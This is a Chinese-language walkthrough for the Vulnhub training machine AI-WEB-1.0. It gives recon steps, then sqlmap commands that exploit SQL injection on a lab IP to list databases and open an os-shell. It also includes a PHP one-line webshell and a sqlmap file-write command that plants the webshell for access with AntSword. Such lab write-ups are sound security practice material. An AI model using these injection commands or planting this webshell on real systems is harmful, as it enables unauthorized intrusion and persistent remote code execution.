【Vulnhub靶场AI-WEB-1.0打靶教程】

第一步:查看虚拟机的ip

第二步:扫描ip下开放的80端口

第三步:扫描查到的ip地址下的目录

第四步:访问查到的目录

访问robot.txt

第五步:访问robot.txt显示出的目录

第六步:打开kali终端,使用sqlmap功能

sqlmap -u "http://192.168.189.153/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --dbs --batch

查到数据库名

进行os-shell连接

sqlmap -u "http://192.168.189.153/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --os-shell

在kali里面/home/kali/目录下创建一个1.php写入一句话木马。语句如下:

php 复制代码
<?php @eval($_POST['pass']);?>

再打开一个终端页面输入命令

sqlmap -u "http://192.168.189.153/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write 1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php

然后返回之前的终端页面输入命令ls查看目录,看到了木马文件上传成功

第七步:打卡蚁剑访问即可

相关推荐
wowocpp29 分钟前
ubuntu 22.04 硬件配置 查看 显卡
linux·运维·ubuntu
萨格拉斯救世主1 小时前
jenkins使用slave节点进行node打包报错问题处理
运维·jenkins
川石课堂软件测试1 小时前
性能测试|docker容器下搭建JMeter+Grafana+Influxdb监控可视化平台
运维·javascript·深度学习·jmeter·docker·容器·grafana
pk_xz1234563 小时前
Shell 脚本中变量和字符串的入门介绍
linux·运维·服务器
小珑也要变强3 小时前
Linux之sed命令详解
linux·运维·服务器
Lary_Rock5 小时前
RK3576 LINUX RKNN SDK 测试
linux·运维·服务器
一坨阿亮8 小时前
Linux 使用中的问题
linux·运维
wclass-zhengge10 小时前
Docker篇(Docker Compose)
运维·docker·容器
李启柱10 小时前
项目开发流程规范文档
运维·软件构建·个人开发·设计规范
力姆泰克12 小时前
看电动缸是如何提高农机的自动化水平
大数据·运维·服务器·数据库·人工智能·自动化·1024程序员节